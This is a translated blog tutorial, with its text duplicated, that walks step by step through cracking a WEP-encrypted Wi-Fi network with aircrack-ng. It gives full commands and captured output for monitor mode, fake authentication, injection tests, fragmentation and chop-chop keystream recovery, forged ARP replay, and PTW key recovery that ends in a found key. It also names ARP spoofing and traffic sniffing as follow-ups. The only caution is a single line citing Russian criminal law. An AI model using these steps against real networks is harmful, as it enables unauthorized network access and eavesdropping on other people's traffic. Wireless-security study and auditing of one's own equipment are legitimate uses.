Practical attack on a wireless network with WEP encryption
The theory and process of the attack was well described by the user n3m0 in the articles "Attacks on Wireless Networks". But the practice there is described rather poorly.
This article will describe the practical process of attacking a wireless network with WEP encryption using the aircrack-ng package and the OpenSuse operating system.
This package is in the repositories of almost all operating systems GNU / Linux. There is a version ported to Windows, but due to the best driver support in Linux, this particular operating system was chosen.
Installation
After installation, there was a question with the hardware. Namely - the adapter built into the Wi-Fi laptop categorically refused to communicate with the point due to the low signal level. As a result, the TrendNet TEW-424UB USB adapter was taken.
The adapter drivers remarkably support airodump, and for aireplay I didn’t have to apply a patch for mac80211.
Link to the site with driver compatibility
dmesg informs us that this adapter does not automatically rise, but we don’t actually need:
Range scan
We start the adapter in monitoring mode.
Hacking is engaged in a virtual adapter mon0. The original adapter is still in management mode.
Now we start the process of scanning available wireless networks.
The fields in the client mean the following:
We will try to find a vulnerability in the ESSID network. As you can see - it is on channel 6. You can simply specify the -c 6 parameter for airodump-ng, but for learning we will suppress the adapter and force it to be set to channel 6:
Due to the fact that the channels of Wi-Fi networks partially overlap
and having tuned to a certain channel, we will also receive neighboring access points, forcibly set only the use of a certain frequency and filter by BSSID. The -w option turns on where to write the captured data.
Then you can either sit and wait for a sufficient number of data packets and go directly to the selection of the key, or use active attacks.
Active attacks.
First, to verify that the dot sees our packages and the drivers support all the functions, you can try to authenticate to the dot. If the client is not authenticated, the point will not accept its packets. We try to authenticate:
')
At the same time check the performance of injections.
Successfully. So we can use active attacks for this point.
Deassociating an existing client is often not worth it - you can open the fact of an attack. Therefore, we will use a fragmentation attack.
It is logical that if a point has at least minimal functions, then there is a CAM table in it and a broadcast packet will arrive to us.
Point supports fragmentation attack. If this attack is not supported, try using the method proposed by korak, called chop-chop.
You can see how much time I pick up is higher than the time on the site due to the low signal to the point. From the aircrack website:
As a result of using both methods, we get the xor-file, which contains the PRGA (pseudo random generation algorithm). Now we can make a fake arp request and use it to collect the required number of data packets.
Now send this package to the network.
At the same time, the number of received data packets from a point should increase dramatically. I have not increased. Strange. Let's try the performance of injections
Works. Let's try to remake the arp request so that it comes as if from a real network. Usually users leave the standard addresses 192.168.1.1/24. Use this address as the respondent. Restart airodump at the same time
Now it worked. The number of packets received at 300 per second.
In less than 3 minutes 30,000 data packets. Let's try to pick up the key.
We hammer a key in the client. Hooray, connect. Now you can make arp-spoofing and listen to traffic - but this is for the next article.
This information is for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation "Illegal access to computer information"
This article will describe the practical process of attacking a wireless network with WEP encryption using the aircrack-ng package and the OpenSuse operating system.
Programs
This package is in the repositories of almost all operating systems GNU / Linux. There is a version ported to Windows, but due to the best driver support in Linux, this particular operating system was chosen.
Installation
# zypper in aircrack-ngAfter installation, there was a question with the hardware. Namely - the adapter built into the Wi-Fi laptop categorically refused to communicate with the point due to the low signal level. As a result, the TrendNet TEW-424UB USB adapter was taken.
# lsusb | grep Net
Bus 001 Device 002: ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network AdapterThe adapter drivers remarkably support airodump, and for aireplay I didn’t have to apply a patch for mac80211.
Link to the site with driver compatibility
dmesg informs us that this adapter does not automatically rise, but we don’t actually need:
[ 2609.580074] rtl8187: Customer ID is 0x00
[ 2609.580144] Registered led device: rtl8187-phy1::tx
[ 2609.580171] Registered led device: rtl8187-phy1::rx
[ 2617.830502] ADDRCONF(NETDEV_UP): wlan0: link is not readyRange scan
We start the adapter in monitoring mode.
# airmon-ng start wlan0
Interface Chipset Driver
eth1 Intel 2200BG ipw2200
wlan0 RTL8187 rtl8187 - [phy1]
(monitor mode enabled on mon0)Hacking is engaged in a virtual adapter mon0. The original adapter is still in management mode.
# iwconfig wlan0
wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBmNow we start the process of scanning available wireless networks.
# airodump-ng mon0The fields in the client mean the following:
- BSSID - MAC address of the access point
- PWR - signal level
- Beacons - the number of service packages from the access point (by the growth of their number, you can indirectly monitor the quality of communication)
- #Data - the number of data packets caught
- CH - channel numbers on which the access point is located
- MB - data transfer rate
- ENC - encryption algorithm
- CIPHER - encryption type
- AUTH - authorization type
- ESSID - access point name
- STATION - client MAC address
- Probes - names of networks with which the client tried to connect
We will try to find a vulnerability in the ESSID network. As you can see - it is on channel 6. You can simply specify the -c 6 parameter for airodump-ng, but for learning we will suppress the adapter and force it to be set to channel 6:
# airmon-ng stop mon0
mon0 RTL8187 rtl8187 - [phy1] (removed)
# airmon-ng start wlan0 6
wlan0 RTL8187 rtl8187 - [phy1]
(monitor mode enabled on mon0)Due to the fact that the channels of Wi-Fi networks partially overlap
and having tuned to a certain channel, we will also receive neighboring access points, forcibly set only the use of a certain frequency and filter by BSSID. The -w option turns on where to write the captured data.
# airodump-ng -c 6 --bssid 00:1B:11:E7:DD:D5 -w essid.out mon0Then you can either sit and wait for a sufficient number of data packets and go directly to the selection of the key, or use active attacks.
Active attacks.
First, to verify that the dot sees our packages and the drivers support all the functions, you can try to authenticate to the dot. If the client is not authenticated, the point will not accept its packets. We try to authenticate:
')
# aireplay-ng -1 0 -e ESSID mon0
No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)
19:30:28 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
19:30:28 Sending Authentication Request (Open System) [ACK]
19:30:28 Authentication successful
19:30:28 Sending Association Request [ACK]
19:30:28 Association successful :-) (AID: 1)At the same time check the performance of injections.
# aireplay-ng -9 -e ESSID mon0
19:31:35 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
19:31:35 Trying broadcast probe requests...
19:31:35 Injection is working!
19:31:36 Found 1 AP
19:31:36 Trying directed probe requests...
19:31:36 00:1B:11:E7:DD:D5 - channel: 6 - 'ESSID'
19:31:37 Ping (min/avg/max): 0.771ms/6.558ms/11.080ms Power: -48.50
19:31:37 30/30: 100%Successfully. So we can use active attacks for this point.
Deassociating an existing client is often not worth it - you can open the fact of an attack. Therefore, we will use a fragmentation attack.
# aireplay-ng -5 -b 00:1B:11:E7:DD:D5 mon0
No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)
19:37:26 Waiting for beacon frame (BSSID: 00:1B:11:E7:DD:D5) on channel 6
19:37:26 Waiting for a data packet...
Read 362 packets...It is logical that if a point has at least minimal functions, then there is a CAM table in it and a broadcast packet will arrive to us.
Size: 277, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:11:E7:DD:D5
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:22:43:01:C6:7F
0x0000: 0842 0000 ffff ffff ffff 001b 11e7 ddd5 .B..............
0x0010: 0022 4301 c67f 8009 3a1f 0000 0eb0 723b ."C....:.....r;
0x0020: c25a 0453 0691 0afa 5ae3 4365 c309 9094 .ZS...Z.Ce....
0x0030: b0f9 90a9 65bf 1785 9f0a 65fa ba5a cb7d ....e.....e..Z.}
0x0040: f357 7167 c133 1efd ca2e 4ec9 9133 ea20 .Wqg.3....N..3.
0x0050: e508 c7af fce3 bbf3 599d c4a9 e01d 5e4f ........Y.....^O
0x0060: 88e8 9997 a5ef 3f0f 058f 3c8a 100f d667 ......?...<....g
0x0070: 2f0f 9f47 a3b0 f4cd 25f8 2cd4 af9e 157c /..G....%.,....|
0x0080: c456 5232 6903 eb5b e935 5dd2 9816 f94c .VR2i..[.5]....L
0x0090: 18ab ea4c aabd 11ed 41a3 88c9 a5ac 726c ...L....A.....rl
0x00a0: 3b81 024c 5cfe 24d9 78a5 339b 02aa e147 ;..L\.$.x.3....G
0x00b0: eeb2 512c 1d52 aaa0 2992 88a7 be2a cd6d ..Q,.R..)....*.m
0x00c0: ab44 3248 619c 2402 8cda 621e ed9c 9109 .D2Ha.$...b.....
0x00d0: 62e9 23f7 be38 5f6f bfc9 da45 310a 6957 b.#..8_o...E1.iW
--- CUT ---
Use this packet ? Y
Saving chosen packet in replay_src-0427-193751.cap
19:38:22 Data packet found!
19:38:22 Sending fragmented packet
19:38:23 No answer, repeating...
19:38:23 Trying a LLC NULL packet
19:38:23 Sending fragmented packet
19:38:25 Not enough acks, repeating...
19:38:25 Trying a LLC NULL packet
19:38:25 Sending fragmented packet
19:38:27 No answer, repeating...
19:38:27 Sending fragmented packet
19:38:27 Got RELAYED packet!!
19:38:27 Trying to get 384 bytes of a keystream
19:38:27 Not enough acks, repeating...
19:38:27 Trying to get 384 bytes of a keystream
19:38:28 No answer, repeating...
19:38:28 Trying to get 384 bytes of a keystream
19:38:28 Trying a LLC NULL packet
19:38:28 Not enough acks, repeating...
19:38:28 Trying to get 384 bytes of a keystream
19:38:28 Trying a LLC NULL packet
19:38:30 No answer, repeating...
19:38:30 Trying to get 384 bytes of a keystream
19:38:30 Got RELAYED packet!!
19:38:30 Trying to get 1500 bytes of a keystream
19:38:30 Got RELAYED packet!!
Saving keystream in fragment-0427-193830.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystreamPoint supports fragmentation attack. If this attack is not supported, try using the method proposed by korak, called chop-chop.
# aireplay-ng -4 -e ESSID mon0
19:42:08 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
Read 182 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
.....
Use this packet ? y
Saving chosen packet in replay_src-0427-194221.cap
Offset 85 ( 0% done) | xor = D5 | pt = BF | 838 frames written in 14259ms
Offset 84 ( 1% done) | xor = 9B | pt = 57 | 1293 frames written in 21971ms
Offset 83 ( 3% done) | xor = 92 | pt = A8 | 2567 frames written in 43637msYou can see how much time I pick up is higher than the time on the site due to the low signal to the point. From the aircrack website:
Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645msAs a result of using both methods, we get the xor-file, which contains the PRGA (pseudo random generation algorithm). Now we can make a fake arp request and use it to collect the required number of data packets.
# packetforge-ng -0 -a 00:1B:11:E7:DD:D5 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0427-193830.xor -w arp-request
Wrote packet to: arp-requestNow send this package to the network.
# aireplay-ng -2 -r arp-request mon0
No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:11:E7:DD:D5
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:09:5B:EC:EE:F2
0x0000: 0841 0201 001b 11e7 ddd5 0009 5bec eef2 .A..........[...
0x0010: ffff ffff ffff 8001 471f 0000 548b 4dde ........G...TM
0x0020: 5747 3254 b5ff 7b7d b389 dbe9 7a9e 389c WG2T..{}....z.8.
0x0030: ce3e 85a3 384f 2858 b612 8532 b57e f3ad .>..8O(X...2.~..
0x0040: 420c 26b8 B.&.
Use this packet ? y
Saving chosen packet in replay_src-0427-195956.cap
You should also start airodump-ng to capture replies.
Sent 1301 packets...(500 pps)At the same time, the number of received data packets from a point should increase dramatically. I have not increased. Strange. Let's try the performance of injections
# aireplay-ng -9 -e ESSID mon0
20:02:47 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
20:02:47 Trying broadcast probe requests...
20:02:48 Injection is working!
20:02:48 Found 1 AP
20:02:48 Trying directed probe requests...
20:02:48 00:1B:11:E7:DD:D5 - channel: 6 - 'ESSID'
20:02:49 Ping (min/avg/max): 0.796ms/6.685ms/10.849ms Power: -48.67
20:02:49 27/30: 90%Works. Let's try to remake the arp request so that it comes as if from a real network. Usually users leave the standard addresses 192.168.1.1/24. Use this address as the respondent. Restart airodump at the same time
# packetforge-ng -0 -a 00:1B:11:E7:DD:D5 -h 00:09:5B:EC:EE:F2 -k 192.168.1.1 -l 192.168.1.250 -y fragment-0427-193830.xor -w arp-request1
Wrote packet to: arp-request1
# aireplay-ng -2 -r arp-request1 mon0
.......
Sent 799 packets...(499 pps)Now it worked. The number of packets received at 300 per second.
In less than 3 minutes 30,000 data packets. Let's try to pick up the key.
# aircrack-ng essid.out-0*.cap
Opening essid.out-01.cap
Opening essid.out-02.cap
Reading packets, please wait...
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 37621 ivs.
KEY FOUND! [ 51:81:82:41:07 ]
Decrypted correctly: 100%
We hammer a key in the client. Hooray, connect. Now you can make arp-spoofing and listen to traffic - but this is for the next article.
This information is for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation "Illegal access to computer information"
Source: https://habr.com/ru/post/92681/
All Articles